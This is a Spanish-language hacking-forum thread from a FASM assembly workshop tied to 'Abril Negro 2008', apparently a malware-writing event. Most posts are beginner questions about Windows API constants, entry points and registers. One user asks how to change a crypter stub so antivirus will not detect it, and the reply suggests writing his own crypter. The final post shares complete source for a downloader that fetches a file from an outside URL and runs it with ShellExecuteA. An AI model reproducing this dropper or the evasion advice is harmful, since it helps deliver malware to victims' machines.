 Autor
|
Tema: Abril Negro 2008: Taller de ASM (Leído 70,999 veces)
|
elmeister
 Desconectado
Mensajes: 43
|
supongo que si, ya que es una API de Windows
|
|
|
|
|
En línea
|
|
|
|
|
~~
|
Si, solo q FASM a diferencia de VB ya trae muchas constantes predefinidas en la win32ax y otras librerias, por eso no tienes como hacer como en VB de andar poniendo el valor de la constante MB_YESNO.
Solo miras en la MSDN la descripcion del api y usas las constantes tal cual
Salu2
|
|
|
|
|
En línea
|
|
|
|
krackwar
Desconectado
Mensajes: 900
|
muchas gracias por responderme  i la ultima preguntita que ago ,en codes de E0n i en ejemplos e visto esto: format PE GUI 4.0 entry start
¿para que sirve? gracias de antgemano s4lu2! |
|
|
|
|
En línea
|
Mi blogBienvenido krackwar, actualmente tu puntuación es de 38 puntos y tu rango es Veteran. El pollo número 1, es decir yo, (krackwar), adoro a Shaddy como a un dios. 
|
|
|
byebye
Desconectado
Mensajes: 5.093
|
indica el formato y el punto de entrada "main".
|
|
|
|
|
En línea
|
|
|
|
krackwar
Desconectado
Mensajes: 900
|
muchas gracias por todas las respuestas!!!!!! , ya se que dije que era mi ultima pregunta pero tengo otra espero no molestar.bueno mi pregunta es eax no acepta mas de 4 letras?? por que por ejemplo en este code que acabode hacer no me deja meter mas de 4 caracteres a eax mirad: include 'C:\Documents and Settings\krackwar\Escritorio\fasmw16726\INCLUDE\win32ax.inc' .data msg dd ? .code start: mov eax , "pre" mov [msg],eax pop eax push MB_YESNO push msg push msg push 0 call [MessageBoxA] cmp eax , IDNO je no mov eax , "si" mov [msg] , eax push 0 push msg push msg push 0 call [MessageBoxA] push 0 call [ExitProcess] no: mov eax , "no" mov [msg] , eax push 0 push msg push msg push 0 call [MessageBoxA] jmp start .end start
|
|
|
|
|
En línea
|
Mi blogBienvenido krackwar, actualmente tu puntuación es de 38 puntos y tu rango es Veteran. El pollo número 1, es decir yo, (krackwar), adoro a Shaddy como a un dios.
|
|
|
byebye
Desconectado
Mensajes: 5.093
|
es logico, estamos trabajando con registros de 32 bits. eax es un DWORD.
|
|
|
|
|
En línea
|
|
|
|
|
~~
|
EAX, EBX, ECX, EDX: Estos cuatro registros serán los que usemos principalmente para almacenar datos. Tienen el tamaño de un DWORD, es decir 4 bytes o lo que es lo mismo 32 bits. Para poner palabras con mas caracteres simplemente pusheas un puntero en la pila y arreglado 
|
|
|
|
|
En línea
|
|
|
|
alexkof158
Desconectado
Mensajes: 415
LOL
|
hellou bob marley, hey puedo abrir el stub del Xcrypter y copiar su codigo y pasarlo a asm, de alli puedo coger los movs que coge el av y puedo quitar o redireccionarlos a otra pila?? algo asi? me esta dando cacao esta chimbada. Helpme man
|
|
|
|
|
En línea
|
|
|
|
|
~~
|
No  Puedes adaptarte un poco el codigo, pero copiando y pegando tal cual no te va a funcionar. Mejor aprende a programarte un crypter tu mismo
He actualizado el primer post. Se han añadido tres capitulos, uno con unas cuantas instrucciones que nos faltaban por aprender, otro con las distintas estructuras que puede tomar el código en FASM y otro en el que explico como declarar variables, asi que cuando los leais ya sabreis hacer algún programilla básico Salu2 E0N |
|
|
|
|
En línea
|
|
|
|
krackwar
Desconectado
Mensajes: 900
|
ola ,bueno muy buenas las partes agregadas .Inspirandome en un downloader que hizo Hendrix ise el mio propio y les paso el code para quien le sirva. include 'C:\Documents and Settings\ezzexziimohn\Escritorio\fasmw16726\INCLUDE\win32a.inc' format PE GUI 4.0 push 0 push 0 push archivo push web push 0 call [Descargar] push 2000 call [dormir] push 0 push titulom push mensajem push 0 call [mensaje] push 2000 call [dormir] push SW_SHOW push 0 push 0 push archivo push 0 push 0 call [Ejecutar] push 0 call [terminar] mensajem db 'El archivo a sido descargado en c:\foto.jpg', 0 titulom db 'downloader basico by krackwar', 0 web db 'http://es.geocities.com/e0n_ftp/bob.jpg' , 0 archivo db 'c:\foto.jpg' , 0 data import library kernel,'KERNEL32.DLL',\ user,'USER32.DLL',\ dlldes, 'urlmon.dll',\ shell, 'SHELL32.DLL' import kernel,\ dormir , 'Sleep',\ terminar,'ExitProcess' import dlldes ,\ Descargar ,'URLDownloadToFileA' import user,\ mensaje,'MessageBoxA' import shell,\ Ejecutar, 'ShellExecuteA' end data
|
|
|
|
|
En línea
|
Mi blogBienvenido krackwar, actualmente tu puntuación es de 38 puntos y tu rango es Veteran. El pollo número 1, es decir yo, (krackwar), adoro a Shaddy como a un dios.
|
|
|
|
 |
